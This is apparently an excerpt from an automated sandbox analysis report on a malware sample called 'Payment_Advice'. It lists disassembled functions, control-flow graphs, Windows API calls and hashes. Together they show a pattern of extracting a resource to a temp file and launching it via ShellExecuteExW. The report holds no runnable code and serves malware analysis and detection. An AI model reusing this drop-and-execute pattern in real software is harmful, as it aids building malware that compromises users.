                                                      • API ID: Heap$Allocate$Free$CreateInitializememset$CriticalErrorExitHandleLastLibraryProcessSectionValue$AllocDestroyEnumLoadModuleResourceTypes
                                                      • String ID:
                                                      • API String ID: 784591235-0
                                                      • Opcode ID: 6c79cbe8f93d5f4fbd4f8e4e936ecf2706f6c11da608655b243cf5d1c1f38f14
                                                      • Instruction ID: 96b79c542ec5316184d4d87f6a3bcb960f47177df14ebed8d3aa0abc3d7ae58b
                                                      • Opcode Fuzzy Hash: 6c79cbe8f93d5f4fbd4f8e4e936ecf2706f6c11da608655b243cf5d1c1f38f14
                                                      • Instruction Fuzzy Hash: B7316271B84701A9E210FBF39C43F9E29289B0874CF51803FB655B50E3DEBD99458A6E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040A700 Relevance: 9.2, APIs: 6, Instructions: 157filememoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 71 40a700-40a716 72 40a720-40a733 call 40d0d8 71->72 73 40a718 71->73 76 40a8e2-40a8eb 72->76 77 40a739-40a740 72->77 73->72 78 40a742-40a74a 77->78 79 40a77e-40a781 77->79 82 40a751-40a757 78->82 83 40a74c 78->83 80 40a783-40a78b 79->80 81 40a7bc-40a7bf 79->81 84 40a792-40a798 80->84 85 40a78d 80->85 86 40a7c1-40a7cd 81->86 87 40a828 81->87 88 40a759 82->88 89 40a75c-40a779 CreateFileW 82->89 83->82 91 40a79a 84->91 92 40a79d-40a7ba CreateFileW 84->92 85->84 93 40a7d8-40a7de 86->93 94 40a7cf-40a7d4 86->94 90 40a82c-40a82f 87->90 88->89 89->90 97 40a835-40a837 90->97 98 40a8cb 90->98 91->92 92->90 95 40a7e0-40a7e3 93->95 96 40a7e7-40a807 CreateFileW 93->96 94->93 95->96 96->97 100 40a809-40a826 CreateFileW 96->100 97->98 99 40a83d-40a844 97->99 101 40a8cf-40a8d2 98->101 102 40a862 99->102 103 40a846-40a84c 99->103 100->90 104 40a8d4 101->104 105 40a8d6-40a8dd call 40d04a 101->105 107 40a865-40a892 102->107 103->102 106 40a84e-40a860 RtlAllocateHeap 103->106 104->105 105->76 106->107 109 40a8b0-40a8b9 107->109 110 40a894-40a89a 107->110 112 40a8bb 109->112 113 40a8bd-40a8bf 109->113 110->109 111 40a89c-40a8aa SetFilePointer 110->111 111->109 112->113 113->101 114 40a8c1-40a8ca 113->114
                                                      APIs
                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,?,?,-00000004,?,00000000,00000000), ref: 0040A771
                                                      • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000,?,?,?,?,-00000004,?,00000000,00000000), ref: 0040A7B2
                                                      • CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,-00000004,?,00000000,00000000), ref: 0040A7FC
                                                      • CreateFileW.KERNEL32(?,40000000,?,00000000,00000005,00000000,00000000,?,?,?,-00000004,?,00000000,00000000), ref: 0040A81E
                                                      • RtlAllocateHeap.NTDLL(00000000,00001000,?), ref: 0040A857
                                                      • SetFilePointer.KERNEL32(?,00000000,?,00000002), ref: 0040A8AA
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: File$Create$AllocateHeapPointer
                                                      • String ID:
                                                      • API String ID: 1439325152-0
                                                      • Opcode ID: ec1f5bb4b2b6a5a964d79ad446a806c37e3583e26d78157729372fc9161ccaeb
                                                      • Instruction ID: 6d6c67b9194597d88171865bc2adb6fdabd1a806897bce184725f7e599815194
                                                      • Opcode Fuzzy Hash: ec1f5bb4b2b6a5a964d79ad446a806c37e3583e26d78157729372fc9161ccaeb
                                                      • Instruction Fuzzy Hash: 7251D472600300ABE3219F24DC44B67BAE5EB44764F248A3AF941B73E0D775DC56CB4A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00401EF4 Relevance: 7.6, APIs: 5, Instructions: 149COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 0040DC00: TlsGetValue.KERNEL32(0000000E), ref: 0040DC17
                                                      • GetTempFileNameW.KERNEL32(00000000,00416020,00000000,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00403F90,00000001,00000000), ref: 00401FC3
                                                      • GetTempFileNameW.KERNEL32(00416020,00000000,00000000,00000000,00000000,00416020,00000000,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00402018
                                                      • GetTempFileNameW.KERNEL32(00416020,00000000,00000000,00000000,00416020,00000000,00000000,00000000,00000000,00416020,00000000,00000000,00000000,00000400,00000000,00000000), ref: 0040206D
                                                      • PathAddBackslashW.SHLWAPI(00416020,00000000,00000000,00000000,00416020,00000000,00000000,00000000,00000000,00416020,00000000,00000000,00000000,00000400,00000000,00000000), ref: 00402078
                                                      • PathRenameExtensionW.SHLWAPI(00000000,00000000,00000000,00416020,00000000,00000000,00000000,00416020,00000000,00000000,00000000,00000000,00416020,00000000,00000000,00000000), ref: 004020B7
                                                        • Part of subcall function 0040DAC0: GetLastError.KERNEL32 ref: 0040DAC6
                                                        • Part of subcall function 0040DAC0: TlsGetValue.KERNEL32(0000000E), ref: 0040DAD5
                                                        • Part of subcall function 0040DAC0: SetLastError.KERNEL32(?), ref: 0040DAEB
                                                        • Part of subcall function 0040DB00: TlsGetValue.KERNEL32(0000000E), ref: 0040DB0C
                                                        • Part of subcall function 0040DB00: RtlAllocateHeap.NTDLL(03410000,00000000,?), ref: 0040DB39
                                                        • Part of subcall function 0040DC60: wcslen.MSVCRT ref: 0040DC77
                                                        • Part of subcall function 0040DB00: RtlReAllocateHeap.NTDLL(03410000,00000000,?,?), ref: 0040DB5C
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: FileNameTempValue$AllocateErrorHeapLastPath$BackslashExtensionRenamewcslen
                                                      • String ID:
                                                      • API String ID: 2266526482-0
                                                      • Opcode ID: 7a206639082f4f66d61dff5ee69ae7d05d1e4220445a0badcf27ca9ec711b6dd
                                                      • Instruction ID: 388e51baf881495eeb61f06cd03d467195245f6dd8312115448fbdabe8adfc61
                                                      • Opcode Fuzzy Hash: 7a206639082f4f66d61dff5ee69ae7d05d1e4220445a0badcf27ca9ec711b6dd
                                                      • Instruction Fuzzy Hash: E041D9B1518300BAD601FBA1DC92E7E7B7DEBC4318F10983FB541B50A3CA3D98599A6D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040D459 Relevance: 7.6, APIs: 5, Instructions: 106memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 190 40d459-40d478 191 40d47a-40d47c 190->191 192 40d47e-40d480 190->192 191->192 193 40d532-40d545 RtlAllocateHeap 192->193 194 40d486-40d4a9 call 40d683 RtlEnterCriticalSection 192->194 196 40d547-40d565 193->196 197 40d57d-40d583 193->197 201 40d4b7-40d4b9 194->201 199 40d570-40d577 RtlInitializeCriticalSection 196->199 200 40d567-40d569 196->200 199->197 200->199 202 40d56b-40d56e 200->202 203 40d4ab-40d4ae 201->203 204 40d4bb 201->204 202->197 206 40d4b0-40d4b3 203->206 207 40d4b5 203->207 205 40d4c7-40d4db RtlAllocateHeap 204->205 208 40d525-40d530 RtlLeaveCriticalSection 205->208 209 40d4dd-40d4f8 call 40d459 205->209 206->207 210 40d4bd-40d4c5 206->210 207->201 208->197 209->208 213 40d4fa-40d51a 209->213 210->205 210->208 214 40d51c 213->214 215 40d51f 213->215 214->215 215->208
                                                      APIs
                                                      • RtlEnterCriticalSection.NTDLL(004175FC), ref: 0040D49A
                                                      • RtlAllocateHeap.NTDLL(00000000,00000018), ref: 0040D4D1
                                                      • RtlLeaveCriticalSection.NTDLL(004175FC), ref: 0040D52A
                                                      • RtlAllocateHeap.NTDLL(00000000,00000038,00000000), ref: 0040D53B
                                                      • RtlInitializeCriticalSection.NTDLL(00000020), ref: 0040D577
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$AllocateHeap$EnterInitializeLeave
                                                      • String ID:
                                                      • API String ID: 2823868979-0
                                                      • Opcode ID: 4bf7ea97ea329fa424e8d9f5269964eaecfc693dbc8ce15ea364cb583d4705d7
                                                      • Instruction ID: a50e7e251860d517ee994747b31fe6338d0b473a1999477304611f5aff0d6b84
                                                      • Opcode Fuzzy Hash: 4bf7ea97ea329fa424e8d9f5269964eaecfc693dbc8ce15ea364cb583d4705d7
                                                      • Instruction Fuzzy Hash: 483180B2D00702ABC3208F99EC44A56BBF5FB44714B15863FE855A77A0D738E948CB98
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00401D59 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • PathQuoteSpacesW.SHLWAPI(?,00000000,00000000), ref: 00401DBA
                                                      • ShellExecuteExW.SHELL32(?), ref: 00401E4B
                                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 00401E6A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: CodeExecuteExitPathProcessQuoteShellSpaces
                                                      • String ID: open
                                                      • API String ID: 1854933444-2758837156
                                                      • Opcode ID: 7e819a3d5a7f870c9bd56f0fd19ad2b4d7cb6ff0937053f34f3cc5d708bd95d3
                                                      • Instruction ID: df19a793e904a2cb908132f9fea35eb48c66dc9965ad0194baf149ad38cba133
                                                      • Opcode Fuzzy Hash: 7e819a3d5a7f870c9bd56f0fd19ad2b4d7cb6ff0937053f34f3cc5d708bd95d3
                                                      • Instruction Fuzzy Hash: 1C310F71908305AFD700FFA1D895A5FB7A9EF84704F10883EF448A6192D77CE909DB9A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040195B Relevance: 4.7, APIs: 3, Instructions: 233libraryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 0040DC00: TlsGetValue.KERNEL32(0000000E), ref: 0040DC17
                                                        • Part of subcall function 0040DAC0: GetLastError.KERNEL32 ref: 0040DAC6
                                                        • Part of subcall function 0040DAC0: TlsGetValue.KERNEL32(0000000E), ref: 0040DAD5
                                                        • Part of subcall function 0040DAC0: SetLastError.KERNEL32(?), ref: 0040DAEB
                                                        • Part of subcall function 004092D8: GetModuleFileNameW.KERNEL32(00000000,00000104,00000104,00000000,?,?,?,00401991,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000), ref: 004092F4
                                                        • Part of subcall function 004092D8: wcscmp.MSVCRT ref: 00409302
                                                        • Part of subcall function 004092D8: memmove.MSVCRT ref: 0040931A
                                                        • Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,004033DD,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189
                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040118B,00000000,00000004), ref: 00401999
                                                      • EnumResourceTypesW.KERNEL32(00000000,00000000,00000000), ref: 004019B6
                                                      • FreeLibrary.KERNEL32(?,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040118B,00000000), ref: 004019BE
                                                        • Part of subcall function 0040DC60: wcslen.MSVCRT ref: 0040DC77
                                                        • Part of subcall function 0040DB00: TlsGetValue.KERNEL32(0000000E), ref: 0040DB0C
                                                        • Part of subcall function 0040DB00: RtlAllocateHeap.NTDLL(03410000,00000000,?), ref: 0040DB39
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: Value$ErrorLastLibrary$AllocateEnumFileFreeHeapLoadModuleNameResourceTypesmemmovewcscmpwcslen
                                                      • String ID:
                                                      • API String ID: 983379767-0
                                                      • Opcode ID: 0bbe8ff36aa40c6eb343e0262a3b2aebc2b774ffe92d4b4111da8ccaba0cf12f
                                                      • Instruction ID: 459b1afe37edd6916da7380a986df78a8a6a67bc14a1ea681291f0eb1f2bbc51
                                                      • Opcode Fuzzy Hash: 0bbe8ff36aa40c6eb343e0262a3b2aebc2b774ffe92d4b4111da8ccaba0cf12f
                                                      • Instruction Fuzzy Hash: 5B51FDB5A18300BAE600BBB29D86E7F766DDBC4718F14883FB541B50D3DA3CD8495A2D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040AC60 Relevance: 4.6, APIs: 3, Instructions: 102COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 409 40ac60-40ac74 410 40ad67-40ad6d 409->410 411 40ac7a-40ac7e 409->411 412 40ac80-40aca8 SetFilePointer 411->412 413 40acab-40acb5 411->413 412->413 414 40acb7-40acc2 413->414 415 40ad28-40ad33 call 40a680 413->415 416 40ad13-40ad25 414->416 417 40acc4-40acc5 414->417 422 40ad55-40ad62 415->422 423 40ad35-40ad52 WriteFile 415->423 419 40acc7-40acca 417->419 420 40acfc-40ad10 417->420 424 40ace7-40acf9 419->424 425 40accc-40accd 419->425 426 40acd1-40ace4 memcpy 422->426 425->426
                                                      APIs
                                                      • SetFilePointer.KERNELBASE(?,?,?,00000001), ref: 0040AC98
                                                      • memcpy.MSVCRT ref: 0040ACD2
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: FilePointermemcpy
                                                      • String ID:
                                                      • API String ID: 1104741977-0
                                                      • Opcode ID: 776d8269a3d3746020e46fe0c54eccab37ce39e43103cfadf76d72bca42313a5
                                                      • Instruction ID: ce1a83e1c3ead8ae0272be6989b960d763ef5069eb00787365914be1b681847d
                                                      • Opcode Fuzzy Hash: 776d8269a3d3746020e46fe0c54eccab37ce39e43103cfadf76d72bca42313a5
                                                      • Instruction Fuzzy Hash: DA31593A2047009FC220DF29E844EABB7E5EFD8315F04882EE59AD7750D235E919CB66
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040DB00 Relevance: 4.6, APIs: 3, Instructions: 53memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 427 40db00-40db27 TlsGetValue 428 40db46-40db65 RtlReAllocateHeap 427->428 429 40db29-40db44 RtlAllocateHeap 427->429 430 40db67-40db8d call 40dfa0 428->430 429->430
                                                      APIs
                                                      • TlsGetValue.KERNEL32(0000000E), ref: 0040DB0C
                                                      • RtlAllocateHeap.NTDLL(03410000,00000000,?), ref: 0040DB39
                                                      • RtlReAllocateHeap.NTDLL(03410000,00000000,?,?), ref: 0040DB5C
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: AllocateHeap$Value
                                                      • String ID:
                                                      • API String ID: 2497967046-0
                                                      • Opcode ID: 46ca97734aea4665f2f9378206e7e0527e4e1eeabe6324ccb875226dbc3139c5
                                                      • Instruction ID: f09a8abe608f87049d0136dfdb2c949314b1adfa7a33e0a903a3785f462648d7
                                                      • Opcode Fuzzy Hash: 46ca97734aea4665f2f9378206e7e0527e4e1eeabe6324ccb875226dbc3139c5
                                                      • Instruction Fuzzy Hash: 8411CB74A00208FFC704DF98D894E9ABBB6FF89314F10C169E9099B394D735AE41CB94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040A305 Relevance: 4.5, APIs: 3, Instructions: 41COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 433 40a305-40a312 434 40a314-40a346 wcsncpy wcslen 433->434 435 40a37d 433->435 436 40a35e-40a366 434->436 437 40a37f-40a382 435->437 438 40a348-40a34f 436->438 439 40a368-40a37b CreateDirectoryW 436->439 440 40a351-40a354 438->440 441 40a35b 438->441 439->437 440->441 442 40a356-40a359 440->442 441->436 442->439 442->441
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: CreateDirectorywcslenwcsncpy
                                                      • String ID:
                                                      • API String ID: 961886536-0
                                                      • Opcode ID: aa1a62586f507797d6a03f634a25732ecab3933eb8c248249a2aef9f2aa5f9c0
                                                      • Instruction ID: 9db04ce1a0381f01c02530f667c42a9535ab4d679698852ad046a5b866225bd9
                                                      • Opcode Fuzzy Hash: aa1a62586f507797d6a03f634a25732ecab3933eb8c248249a2aef9f2aa5f9c0
                                                      • Instruction Fuzzy Hash: CA016CB140131896CB24DB74C85DAAEB364DF04304F2441B7DD15E21D1E7799AA4DB5A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00408A2E Relevance: 4.5, APIs: 3, Instructions: 20COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 443 408a2e-408a66 memset 753CE3E0 CoInitialize
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: Initializememset
                                                      • String ID:
                                                      • API String ID: 640720207-0
                                                      • Opcode ID: d470925c7e0f1dc52620b8a1c10874dd07e431f23b4b855a0d6157dcd2eba0ed
                                                      • Instruction ID: ac5f13dc28c04c2a22c35059db173eb0360c4c60f11cda37de6548a0ec479162
                                                      • Opcode Fuzzy Hash: d470925c7e0f1dc52620b8a1c10874dd07e431f23b4b855a0d6157dcd2eba0ed
                                                      • Instruction Fuzzy Hash: 18E0ECB594030CBBEB409FD0EC0EF9DBB7CEB05705F4045B9F904A6281EBB5A6088B95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00403A79 Relevance: 3.6, APIs: 2, Instructions: 550COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 592 403a79-403a7a 593 403a7f-403a8a 592->593 593->593 594 403a8c-403aa2 call 40dc00 593->594 597 403aa4-403aac 594->597 598 403b12-403b23 597->598 599 403aae-403b10 call 40dac0 * 2 call 405f10 call 40db00 call 40dac0 call 40dc60 * 2 call 40db00 597->599 601 403b25-403b2d 598->601 599->597 599->598 603 403b93-403ba4 601->603 604 403b2f-403b91 call 40dac0 * 2 call 405f10 call 40db00 call 40dac0 call 40dc60 * 2 call 40db00 601->604 607 403ba6-403bae 603->607 604->601 604->603 610 403bb0-403c12 call 40dac0 * 2 call 405f10 call 40db00 call 40dac0 call 40dc60 * 2 call 40db00 607->610 611 403c14-403c25 607->611 610->607 610->611 615 403c27-403c2f 611->615 616 403c31-403c8b call 40dac0 * 2 call 405f10 call 40db00 call 40dac0 call 40dc60 * 2 call 40db00 615->616 617 403c95-403ca6 615->617 731 403c90-403c93 616->731 623 403ca8-403cb0 617->623 629 403cb2-403d14 call 40dac0 * 2 call 405f10 call 40db00 call 40dac0 call 40dc60 * 2 call 40db00 623->629 630 403d16-403d27 623->630 629->623 629->630 637 403d29-403d31 630->637 643 403d33-403d99 call 40dac0 * 2 call 405f10 call 40db00 call 40dac0 call 40dc60 * 2 call 40db00 637->643 644 403d9b-403dac 637->644 643->637 643->644 651 403dae-403db6 644->651 658 403e20-403e31 651->658 659 403db8-403e16 call 40dac0 * 2 call 405f10 call 40db00 call 40dac0 call 40dc60 * 2 call 40db00 651->659 667 403e33-403e3b 658->667 758 403e1b-403e1e 659->758 675 403ea5-404011 call 40dac0 call 403400 call 40db00 call 40949e GetModuleHandleW call 40dac0 * 4 call 40cd40 call 405182 call 405e30 call 40db00 call 40dac0 * 4 call 40cd40 call 405182 call 405e30 call 40db00 call 4031b1 call 40dac0 call 40224e call 4051a0 call 401ef4 call 404163 call 40dac0 call 405100 call 403718 call 40db00 PathRemoveBackslashW call 4020e9 call 409500 call 40214f call 40dac0 call 401c21 call 40db00 667->675 676 403e3d-403ea3 call 40dac0 * 2 call 405f10 call 40db00 call 40dac0 call 40dc60 * 2 call 40db00 667->676 821 404013-404029 call 40548c 675->821 822 40402b-40402f call 402fbd 675->822 676->667 676->675 731->615 731->617 758->651 758->658 826 404034-404162 call 40dac0 call 40dc60 call 40dac0 * 2 call 4060b0 call 40db00 call 40dac0 * 2 call 40dc60 * 3 call 40dcc0 call 40dac0 * 2 call 40a435 call 40dcc0 call 40dac0 call 40dc60 * 2 call 405182 * 3 call 401d59 call 4051a0 call 401cf6 call 40db90 * 9 821->826 822->826
                                                      APIs
                                                        • Part of subcall function 0040DB00: TlsGetValue.KERNEL32(0000000E), ref: 0040DB0C
                                                        • Part of subcall function 0040DB00: RtlAllocateHeap.NTDLL(03410000,00000000,?), ref: 0040DB39
                                                        • Part of subcall function 0040DAC0: GetLastError.KERNEL32 ref: 0040DAC6
                                                        • Part of subcall function 0040DAC0: TlsGetValue.KERNEL32(0000000E), ref: 0040DAD5
                                                        • Part of subcall function 0040DAC0: SetLastError.KERNEL32(?), ref: 0040DAEB
                                                        • Part of subcall function 0040DC60: wcslen.MSVCRT ref: 0040DC77
                                                        • Part of subcall function 0040DB00: RtlReAllocateHeap.NTDLL(03410000,00000000,?,?), ref: 0040DB5C
                                                      • GetModuleHandleW.KERNEL32(00000000,?,00000000,00000000), ref: 00403ED2
                                                        • Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,004033DD,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189
                                                        • Part of subcall function 00405E30: CharUpperW.USER32(00000000,00000000,FFFFFFF5,00001000,?,?,00001000,004033E5,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00405E81
                                                        • Part of subcall function 004031B1: FindResourceW.KERNEL32(00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,00403F71,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 004031D9
                                                        • Part of subcall function 00401EF4: GetTempFileNameW.KERNEL32(00000000,00416020,00000000,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00403F90,00000001,00000000), ref: 00401FC3
                                                        • Part of subcall function 00401EF4: GetTempFileNameW.KERNEL32(00416020,00000000,00000000,00000000,00000000,00416020,00000000,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00402018
                                                      • PathRemoveBackslashW.SHLWAPI(00000000,00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403FCB
                                                        • Part of subcall function 00409500: SetEnvironmentVariableW.KERNELBASE(?,?,00403FE8,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00409519
                                                        • Part of subcall function 0040548C: CreateThread.KERNEL32(00000000,00001000,00000000,00000000,00000000,?), ref: 004054A5
                                                        • Part of subcall function 0040548C: RtlEnterCriticalSection.NTDLL(00417680), ref: 004054B7
                                                        • Part of subcall function 0040548C: WaitForSingleObject.KERNEL32(00000008,00000000,00000000,?,?,?,?,00403140,00000000,00000000,00000000,0000000A,00000001,00000000,00000000,00000000), ref: 004054CE
                                                        • Part of subcall function 0040548C: CloseHandle.KERNEL32(00000008,?,?,?,?,00403140,00000000,00000000,00000000,0000000A,00000001,00000000,00000000,00000000,00000000,00000000), ref: 004054DA
                                                        • Part of subcall function 0040548C: RtlLeaveCriticalSection.NTDLL(00417680), ref: 0040551D
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: Value$AllocateCriticalErrorFileHandleHeapLastNameSectionTemp$BackslashCharCloseCreateEnterEnvironmentFindLeaveModuleObjectPathRemoveResourceSingleThreadUpperVariableWaitwcslen
                                                      • String ID:
                                                      • API String ID: 1263086577-0
                                                      • Opcode ID: b82d4a2b996f595ba5c1d763e67e136d9313fe1510dfd2df2d4df1b3f91113b9
                                                      • Instruction ID: f5a9b2353c4208d2d2e49e7cbb2e39cfe29240165c79b9212fe679793e11b04d
                                                      • Opcode Fuzzy Hash: b82d4a2b996f595ba5c1d763e67e136d9313fe1510dfd2df2d4df1b3f91113b9
                                                      • Instruction Fuzzy Hash: 7402AAB5A18300AED200FBB1998197F7BBCEBC8719F10D83FB545A6192C63CD9459B2D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040AA00 Relevance: 3.1, APIs: 2, Instructions: 65memoryfileCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 895 40aa00-40aa19 call 40d0d8 898 40aaae-40aab3 895->898 899 40aa1f-40aa3e CreateFileW 895->899 900 40aa40-40aa42 899->900 901 40aa92-40aa95 899->901 900->901 904 40aa44-40aa4b 900->904 902 40aa97 901->902 903 40aa99-40aaa0 call 40d04a 901->903 902->903 909 40aaa5-40aaab 903->909 906 40aa60 904->906 907 40aa4d-40aa5e RtlAllocateHeap 904->907 908 40aa63-40aa8a 906->908 907->908 910 40aa8c 908->910 911 40aa8e-40aa90 908->911 910->911 911->901 911->909
                                                      APIs
                                                        • Part of subcall function 0040D0D8: RtlEnterCriticalSection.NTDLL(00000020), ref: 0040D0E3
                                                        • Part of subcall function 0040D0D8: RtlLeaveCriticalSection.NTDLL(00000020), ref: 0040D15E
                                                      • CreateFileW.KERNELBASE(?,80000000,00000000,00000000,00000003,00000080,00000000,?,00000000,?,?,00000000,0040352F,00000000,00000000,00000000), ref: 0040AA33
                                                      • RtlAllocateHeap.NTDLL(00000000,00001000), ref: 0040AA55
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$AllocateCreateEnterFileHeapLeave
                                                      • String ID:
                                                      • API String ID: 2608263337-0
                                                      • Opcode ID: 777222757d6ac8f310b92d6d48f0c472615004c48d60ff8c3faa9f498e70ad84
                                                      • Instruction ID: 0c7c59af070097b429fff24e53322bbcd4a548db6c14e4240a8466396a0194e3
                                                      • Opcode Fuzzy Hash: 777222757d6ac8f310b92d6d48f0c472615004c48d60ff8c3faa9f498e70ad84
                                                      • Instruction Fuzzy Hash: 5B11BE71200700ABC2308F5AED48F57BBE8EBC4724F11823EF495A22E0D7769819CF69
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040D80A Relevance: 3.1, APIs: 2, Instructions: 61memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 912 40d80a-40d821 call 40d95d 915 40d827-40d844 RtlAllocateHeap 912->915 916 40d8a9-40d8ae 912->916 917 40d846-40d88c memset call 4113e4 915->917 918 40d8a8 915->918 917->918 921 40d88e-40d890 917->921 918->916 921->918 922 40d892-40d894 921->922 923 40d898-40d8a2 call 41180f 922->923 926 40d8a4 923->926 926->918
                                                      APIs
                                                        • Part of subcall function 0040D95D: HeapFree.KERNEL32(00000000,-00000018,00000200,00000000,0040D81B,00000200,?,?,?,0040112D,0000000C,000186A1,00000007,00416078,00417070,00000004), ref: 0040D99E
                                                      • RtlAllocateHeap.NTDLL(00000000,FFFFFFDD), ref: 0040D83A
